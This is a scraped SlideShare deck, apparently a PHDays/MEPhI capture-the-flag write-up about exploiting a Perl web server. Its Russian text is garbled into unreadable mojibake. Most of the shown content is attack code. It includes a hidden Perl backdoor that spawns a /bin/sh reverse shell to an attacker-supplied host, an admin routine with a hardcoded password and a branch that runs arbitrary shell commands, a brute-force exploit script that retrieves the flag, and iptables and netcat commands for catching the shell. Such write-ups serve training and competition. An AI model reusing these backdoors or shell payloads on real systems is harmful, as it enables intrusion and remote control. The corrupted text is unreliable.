plwww (24.03) MEPHI (PHDays)
- 2. PLWWW 亳 亠仄 亠亞仂 亠亟
弌亠于亳 仂仆仂仍亳 亰舒舒从亳 亳仍亠亟仂于舒亠仍从仂亶 仍舒弍仂舒仂亳亳.
舒弍仂舒 亠于亳仂仄 仂亠于仍磳 仗仂 亠亟于舒仄 仗仂仂从仂仍舒 HTTP, 仆仂
仗仂亟亟亠亢亳于舒ム亠亞仂 于亠亞仂 亟于舒 仄亠仂亟舒 舒弍仂 GET 亳 ADMIN. 亠仂亟 GET
仍亢亳 仂仍从仂 亟仍 仗仂仍亠仆亳 亳仆仂仄舒亳亳, 仄亠仂亟 ADMIN 亟仍 亟仂仗舒 从
仗舒仆亠仍亳 仗舒于仍亠仆亳 亠于亳仂仄. 仂仍亠 亰舒仗从舒, 亠于亳 亟仂仗亠仆 仆舒 仗仂
8080.
弌仂 仂仂仆 舒亶仍仂于仂亶 亳亠仄 亠于亳 仗亠亟舒于仍磳 仂弍仂亶 从亳仗,
舒亰舒弍仂舒仆仆亶 仆舒 磶从亠 Perl. 仂亟 从亳仗舒 仆亠 仂弍亳仂于舒仆, 仆仂 亠亞仂
从舒 亳 亳仗仂仍亰亠仄亠 仄亠仂亟 于于仂亟 于 亰舒弍仍亢亟亠仆亳亠 仗亳 仗亠于仂仄
舒仄仂亠仆亳亳. 亅仂 亟亠仍舒仆仂. 舒仆仆亶 仄亠仂亟 舒亰舒弍仂从亳 从亳仗舒
仂弍仆磳 仂 仂仂仆 仍亠亞亠仆亟 亠仄, 仂 仂仆 弍仍 仆舒仗亳舒仆 仆舒 从仂 从
仗仂亞舒仄仄亳舒仄亳 舒亰仍亳仆 亞舒仍舒从亳亠从亳 舒.
- 3. PLWWW 亳 亠仄 亠亞仂 亠亟 (192.168.X.2:8080)
4 仂仂礌亳
#1 仂亳弍从舒 仗亳 亞亠仆亠舒亳亳 亠舒
#2 仍舒弍亶 仗舒仂仍 舒亟仄亳仆亳舒仂舒 (弍舒仆舒仍仆仂)
#3 弍从亟仂 (舒仆仆仂, 仂从亟舒 仂仆 仗仂磦亳仍? )
#4 RCE (仂亠于亳亟仆舒, 仆仂 仂仍从仂
仆舒 仗亠于亶 于亰亞仍磲)
- 5. PLWWW #1 (192.168.X.2:8080)
仂仆 仗亳仆亳仗 舒弍仂 亠于亳舒
个仆从亳 tToSystem
(仂弍亠仆仆仂 亟舒仆仆仂亶 仆从亳亳 仂仂亳 于 仂仄, 仂 仂仆舒 亰舒仄亠仆磳 于亠 亞仍舒仆亠 仍舒亳仆从仂亞仂
舒仍舒于亳舒 仗亳于ム亳亠 于 亰舒仗仂亠 仆舒 仆舒弍仂 亟亞亳 亳仄于仂仍仂于 (仂亞仍舒仆亠 仍舒亳仆从仂亞仂
舒仍舒于亳舒 + 仗亠 亳仄于仂仍))
亠仂亟 GET 仆从亳 kh8ploegjst
- 6. PLWWW #1 - cryptFn (192.168.X.2:8080)
kh8ploegjst -> cryptFn
sub cryptFn (&@) {
my($tXt,@enc,$len)=@_;
my $jk;
my $encK="";
for ($jk=0;$jk le $len;$jk++) {
$encK .= $enc[$jk];
}
for ($jk=0;$jk <= $len;$jk++) {
$encK .= $enc[$jk];
}
my $value=md5_hex("$tXt$encK");
return $value;
}
- 7. PLWWW #1- cryptFn (192.168.X.2:8080)
丱 : cryptFn(record_1,split(//,XXSSDDFDS),scalar(split(//,$_)))
sub cryptFn (&@) {
my($tXt,@enc,$len)=@_;
my $jk;
my $encK="";
for ($jk=0;$jk le $len;$jk++) {
$encK .= $enc[$jk];
}
for ($jk=0;$jk <= $len;$jk++) {
$encK .= $enc[$jk];
}
my $value=md5_hex("$tXt$encK");
return $value;
}
乘丱 : md5_hex(record_1X");
- 8. PLWWW #1 - exploit (192.168.X.2:8080)
个仆从亳 kh8ploegjst 亟仂舒仂仆仂 仗仂亟舒于亳 束0損 从舒从 亟仍亳仆 亳仄亠仆亳
亟亳亠从仂亳亳 亟仍 于仂亟舒 于 从仂亠仆.
仍 仗仂仍亠仆亳 于舒仍亳亟仆仂亞仂 亠舒 舒亶仍舒 YOURFLAG.TXT 亟仂舒仂仆仂 亰仆舒
仗亠于亶 亳仄于仂仍 亠从亠仆仂亞仂 从仍ム舒.
#!/usr/bin/perl
use LWP::UserAgent;
use Digest::MD5 'md5_hex';
@crypto=(a..z);
$fileName="YOURFLAG.TXT";
$ua=LWP::UserAgent->new();
foreach $sym (@crypto) {
$sym="d";
$value=md5_hex("$fileName$sym");
print "$sym $valuen";
$br=$ua->get("http://192.168.1.2:8080/0$value");
print $br->content;
if ($br->content=~/FLAG/) {
print $br->content;
exit();
}
}
- 10. PLWWW #3 (192.168.X.2:8080)
弌仄亠仆舒 仂仂礌亳 亠于亳舒, 仗仂仄亳仄仂 亰舒仗仍舒仂从, 仗亳仆仂亳 于 从仂亟 仆亠弍仂仍仂亶
弍亠从亟仂. 亠从亟仂 仗亠亟舒于仍磳 仂弍仂亶 仆亠仂弍仆仂亠 仗仂于亠亟亠仆亳亠 亠于亳舒 仗亳
仂弍舒亠仆亳亳 从 仆亠仄 仂 仗亠亳舒仍仆仂 仂仄亳仂于舒仆仆仄 亰舒仗仂仂仄 亠于亳
仂亰亟舒亠 弍亠从从仂仆仆亠从 仆舒 从舒亰舒仆仆亶 于 亰舒仗仂亠 IP 舒亟亠 仗亠亟仂舒于仍亠仆亳亠仄
从仂仄舒仆亟仆仂亶 仂从亳.
sub pm_backton (&@) {
use IO::Socket;use Socket;use FileHandle;my($h0st)=@_;$h0st=~s/d/./gi;my $tm='/bin/sh';
my $p0rt=int(rand(20000))+10000;socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
connect(SOCKET, sockaddr_in($p0rt, inet_aton($h0st)));SOCKET->autoflush();open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");open(STDERR,">&SOCKET");system($tm);
}
- 11. PLWWW #3 (192.168.X.2:8080)
亠仂亟 ADMIN 仆从亳 kh8p1oegst
sub kh8p1oegjst (&@) {
my($query,$enc_key)=@_;
my $status="";
my $aPass="dfknmsdxz83945023489532";
open(FE,"configuration");
while (my $e=<FE>) {chomp($e);if ($e=~/PASSWORD/) {$e=~s/PASSWORD //gi;$aPass=$e;}}
close(FE);
if ($query=~/klrbxtzkljsbrklpjsfxljsspzkssndklrd/) {
my(@Fghj)=split(/klrbxtzkljsbrklpjsfxljsspzkssndklrd/,$query);
if ($aPass eq $Fghj[1]) {
$status=&aPage;
}
} elsif ($query=~/klrbxczklisbrklpjsfxljsspzkssndklrd/) {
my(@Fghj)=split(/klrbxczklisbrklpjsfxljsspzkssndklrd/,$query);
$status=`$Fghj[1]`;
}
if ($query=~/bzkckdklklr/) {$query=~s/bzkckdklklr//gi;&pm_backton($query);}
return $status;
}
- 12. PLWWW #3 exploit (192.168.X.2:8080)
iptables -t nat -A OUTPUT -p tcp --dport 10000:30000 -j REDIRECT --to-ports 31337
nc l p 31337
![PLWWW #1 - cryptFn (192.168.X.2:8080)
kh8ploegjst -> cryptFn
sub cryptFn (&@) {
my($tXt,@enc,$len)=@_;
my $jk;
my $encK="";
for ($jk=0;$jk le $len;$jk++) {
$encK .= $enc[$jk];
}
for ($jk=0;$jk <= $len;$jk++) {
$encK .= $enc[$jk];
}
my $value=md5_hex("$tXt$encK");
return $value;
}](https://image.slidesharecdn.com/plwww-120326044739-phpapp01/85/plwww-24-03-MEPHI-PHDays-6-320.jpg)
![PLWWW #1- cryptFn (192.168.X.2:8080)
丱 : cryptFn(record_1,split(//,XXSSDDFDS),scalar(split(//,$_)))
sub cryptFn (&@) {
my($tXt,@enc,$len)=@_;
my $jk;
my $encK="";
for ($jk=0;$jk le $len;$jk++) {
$encK .= $enc[$jk];
}
for ($jk=0;$jk <= $len;$jk++) {
$encK .= $enc[$jk];
}
my $value=md5_hex("$tXt$encK");
return $value;
}
乘丱 : md5_hex(record_1X");](https://image.slidesharecdn.com/plwww-120326044739-phpapp01/85/plwww-24-03-MEPHI-PHDays-7-320.jpg)
![PLWWW #3 (192.168.X.2:8080)
亠仂亟 ADMIN 仆从亳 kh8p1oegst
sub kh8p1oegjst (&@) {
my($query,$enc_key)=@_;
my $status="";
my $aPass="dfknmsdxz83945023489532";
open(FE,"configuration");
while (my $e=<FE>) {chomp($e);if ($e=~/PASSWORD/) {$e=~s/PASSWORD //gi;$aPass=$e;}}
close(FE);
if ($query=~/klrbxtzkljsbrklpjsfxljsspzkssndklrd/) {
my(@Fghj)=split(/klrbxtzkljsbrklpjsfxljsspzkssndklrd/,$query);
if ($aPass eq $Fghj[1]) {
$status=&aPage;
}
} elsif ($query=~/klrbxczklisbrklpjsfxljsspzkssndklrd/) {
my(@Fghj)=split(/klrbxczklisbrklpjsfxljsspzkssndklrd/,$query);
$status=`$Fghj[1]`;
}
if ($query=~/bzkckdklklr/) {$query=~s/bzkckdklklr//gi;&pm_backton($query);}
return $status;
}](https://image.slidesharecdn.com/plwww-120326044739-phpapp01/85/plwww-24-03-MEPHI-PHDays-11-320.jpg)
